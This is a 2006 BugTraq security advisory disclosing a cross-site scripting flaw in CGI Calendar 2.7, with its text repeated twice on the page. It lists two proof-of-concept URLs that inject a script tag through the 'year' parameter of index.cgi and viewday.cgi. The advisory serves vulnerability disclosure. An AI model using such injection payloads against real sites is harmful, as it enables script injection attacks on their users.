BugTraq
Back to list
|
Post reply
CGI Calendar XSS Vulnerability
Feb 26 2006 09:32PM
revnic gmail com
CGI Calendar XSS Vulnerability
Software: CGI Calendar
Version: 2.7
http://cgicalendar.sourceforge.net/
Description: an online calendar implemented using CGI technology
Vulnerability: Cross-Site Scripting
Exploit:
/cgi-bin/calendar2/index.cgi?lang=en-us&mode=all&month=2&date=1&year=<sc
ript>alert('xss');</script>&db=1
/cgi-bin/calendar2/viewday.cgi?lang=en-us&mode=all&month=2&date=1&year=<
script>alert('xss');</script>&db=1
Credit:
Discovered by Revnic Vasile
revnic (at) gmail (dot) com [email concealed]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Software: CGI Calendar
Version: 2.7
http://cgicalendar.sourceforge.net/
Description: an online calendar implemented using CGI technology
Vulnerability: Cross-Site Scripting
Exploit:
/cgi-bin/calendar2/index.cgi?lang=en-us&mode=all&month=2&date=1&year=<sc
ript>alert('xss');</script>&db=1
/cgi-bin/calendar2/viewday.cgi?lang=en-us&mode=all&month=2&date=1&year=<
script>alert('xss');</script>&db=1
Credit:
Discovered by Revnic Vasile
revnic (at) gmail (dot) com [email concealed]
[ reply ]